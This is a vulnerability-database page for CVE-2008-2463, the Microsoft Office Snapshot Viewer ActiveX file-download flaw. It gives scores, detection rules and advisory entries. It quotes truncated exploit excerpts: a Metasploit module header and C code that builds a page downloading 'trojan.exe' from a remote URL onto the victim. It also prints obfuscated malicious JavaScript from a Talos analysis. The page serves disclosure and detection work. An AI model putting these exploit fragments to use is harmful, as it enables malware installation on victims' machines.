CVE-2008-2463
published 2008-07-07CVE-2008-2463: The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access…
PriorityP267medium6.8CVSS 2.0
AVNACMAuNCPIPAP
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
59.13%
99.0th percentile
The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | office_snapshot_viewer_activex | — | — |
| microsoft | office_snapshot_viewer_activex | — | — |
| microsoft | office_snapshot_viewer_activex | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort↗
SID 13903-13910
snort↗
SID 15362
- →Detect ActiveX instantiation of the Snapshot Viewer Control by looking for the ProgID 'snpvw.Snapshot Viewer Control.1' in HTML/script content delivered over HTTP. ↗
- →Detect JavaScript obfuscation via excessive String.fromCharCode() density: more than ~5 calls within a 500-byte window is a strong indicator of malicious obfuscation used to hide this exploit. ↗
- →Detect eval(unescape('...')) obfuscation pattern where unescape payload is large — a known technique used to deliver this and related ActiveX exploits. ↗
- →Monitor for files written to Startup folder paths (e.g., All Users\Start Menu\Programs\Startup) by browser or ActiveX processes, as the exploit leverages this for code execution persistence. ↗
- →Exploit delivery uses chained HTTP 302 redirects and nested 1x1 pixel iframes across multiple levels before serving the final ActiveX exploit page — multi-hop redirect chains to small iframes are a detection signal. ↗
- ·Snort SIDs 13903-13910 cover direct (non-obfuscated) CVE-2008-2463 exploit traffic but will NOT fire on heavily obfuscated JavaScript delivery of the same exploit. ↗
- ·SID 15362 (String.fromCharCode density detection) may generate false positives against legitimate sites that obfuscate JavaScript; analyst triage or per-site whitelisting is recommended. ↗
- ·The eval(unescape()) detection rule may also generate occasional false positives and should be tuned accordingly. ↗
- ·The Metasploit module randomizes the ActiveX object variable name and the dropped executable filename, so static string signatures on those values will not be reliable. ↗
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
vulncheck6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-frx4-jc3x-7q59: The Microsoft Office Snapshot Viewer ActiveX control in snapview
ghsa_unreviewed·2022-05-01
CVE-2008-2463 [MEDIUM] CWE-94 GHSA-frx4-jc3x-7q59: The Microsoft Office Snapshot Viewer ActiveX control in snapview
The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder.
VulnCheck
Microsoft Office Improper Control of Generation of Code ('Code Injection')
vulncheck·2008·CVSS 6.8
CVE-2008-2463 [MEDIUM] Microsoft Office Improper Control of Generation of Code ('Code Injection')
Microsoft Office Improper Control of Generation of Code ('Code Injection')
The Microsoft Office Snapshot Viewer ActiveX control in snapview.ocx 10.0.5529.0, as distributed in the standalone Snapshot Viewer and Microsoft Office Access 2000 through 2003, allows remote attackers to download arbitrary files to a client machine via a crafted HTML document or e-mail message, probably involving use of the SnapshotPath and CompressedPath properties and the PrintSnapshot method. NOTE: this can be leveraged for code execution by writing to a Startup folder.
Affected: Microsoft Office
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://learn.microsoft.com/en-us/
No detection rules found.
Exploit-DB
Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)
exploitdb·2010-09-20
CVE-2008-2463 Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)
Snapshot Viewer for Microsoft Access - ActiveX Control Arbitrary File Download (Metasploit)
---
##
# $Id: ms08_041_snapshotviewer.rb 10394 2010-09-20 08:06:27Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download',
'Description' => %q{
This module allows remote attackers to place arbitrary files on a users file system
via the Microsoft Office Snapshot Viewer ActiveX Control.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC' ],
'Version' => '$Revision: 10394 $',
'R
Exploit-DB
Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download
exploitdb·2008-07-24
CVE-2008-2463 Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download
Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download
---
/* Microsoft Access Snapshot Viewer ActiveX Control Exploit
Ms-Access SnapShot Exploit Snapview.ocx v 10.0.5529.0
Download nice binaries into an arbitrary box
Vulnerability discovered by Oliver Lavery
https://www.securityfocus.com/bid/8536/info
Remote: Yes
greetz to str0ke */
#include
#include
#define Filename "Ms-Access-SnapShot.html"
FILE *File;
char data[] = "\n\n"
"\nvar arbitrary_file = 'http://path_to_trojan'\n"
"var dest = 'C:/Docume~1/ALLUSE~1/trojan.exe'\nattack.SnapshotPath = arbitrary_file\n"
"attack.CompressedPath = destination\nattack.PrintSnapshot(arbitrary_file,destination)\n"
"\n";
int main ()
{
printf("**Microsoft Access Snapshot Viewer ActiveX Exploit**\n");
printf("**c0ded by callAX**\
Metasploit
Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
metasploit
Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
This module allows remote attackers to place arbitrary files on a users file system via the Microsoft Office Snapshot Viewer ActiveX Control.
Talos
Detecting Silly Javascript Obfuscation Techniques
blogs_talos·2009-02-24
Detecting Silly Javascript Obfuscation Techniques
## Detecting Silly Javascript Obfuscation Techniques
Last week I got an e-mail from Edward Fjellskål, Senior Security Analyst at Sourcefire's new Norwegian partner Redpill Linpro . He'd run across a strange piece of obfuscated Javascript at hxxp://bizoplata.ru/pay.html (WARNING: CONTAINS LIVE MALWARE), and he wanted to know if I could figure out what exactly it was doing and whether it was indeed malicious.
A quick wget of that URL gave me Javascript that was clearly trying to hide something:
document.write(''+'<ifr'+'am'+'e '+String.fromCharCode(105)+String.fromCharCode( 100)+String.fromCharCode(61)+''+'"7'+'4f'+String.fromCharCode(52)+''+unescape('% 32')+'5'+'c'+unescape('%30')+unescape('%65%65%39')+unescape('%32%62')+String.fro
mCharCode(52)+String.fromCharCode(56)+''+'992a'+unescap
Talos
Detecting Silly Javascript Obfuscation Techniques
blogs_talos·2009-02-24
Detecting Silly Javascript Obfuscation Techniques
Last week I got an e-mail from Edward Fjellskål, Senior Security Analyst at Sourcefire's new Norwegian partner Redpill Linpro. He'd run across a strange piece of obfuscated Javascript at hxxp://bizoplata.ru/pay.html (WARNING: CONTAINS LIVE MALWARE), and he wanted to know if I could figure out what exactly it was doing and whether it was indeed malicious.
A quick wget of that URL gave me Javascript that was clearly trying to hide something:
`document.write(''+'<ifr'+'am'+'e '+String.fromCharCode(105)+String.fromCharCode( 100)+String.fromCharCode(61)+''+'"7'+'4f'+String.fromCharCode(52)+''+unescape('% 32')+'5'+'c'+unescape('%30')+unescape('%65%65%39')+unescape('%32%62')+String.fro`
`mCharCode(52)+String.fromCharCode(56)+''+'992a'+unescape('%65%33%62')+String.fro`
`mCharCode(49)+String.from
http://marc.info/?l=bugtraq&m=121915960406986&w=2http://secunia.com/advisories/30883http://www.exploit-db.com/exploits/6124http://www.kb.cert.org/vuls/id/837785http://www.microsoft.com/technet/security/advisory/955179.mspxhttp://www.securityfocus.com/bid/30114http://www.securitytracker.com/id?1020433http://www.us-cert.gov/cas/techalerts/TA08-189A.htmlhttp://www.us-cert.gov/cas/techalerts/TA08-225A.htmlhttp://www.vupen.com/english/advisories/2008/2012/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43613https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6120http://marc.info/?l=bugtraq&m=121915960406986&w=2http://secunia.com/advisories/30883http://www.exploit-db.com/exploits/6124http://www.kb.cert.org/vuls/id/837785http://www.microsoft.com/technet/security/advisory/955179.mspxhttp://www.securityfocus.com/bid/30114http://www.securitytracker.com/id?1020433http://www.us-cert.gov/cas/techalerts/TA08-189A.htmlhttp://www.us-cert.gov/cas/techalerts/TA08-225A.htmlhttp://www.vupen.com/english/advisories/2008/2012/referenceshttps://exchange.xforce.ibmcloud.com/vulnerabilities/43613https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6120
2008-07-07
Published
Exploited in the wild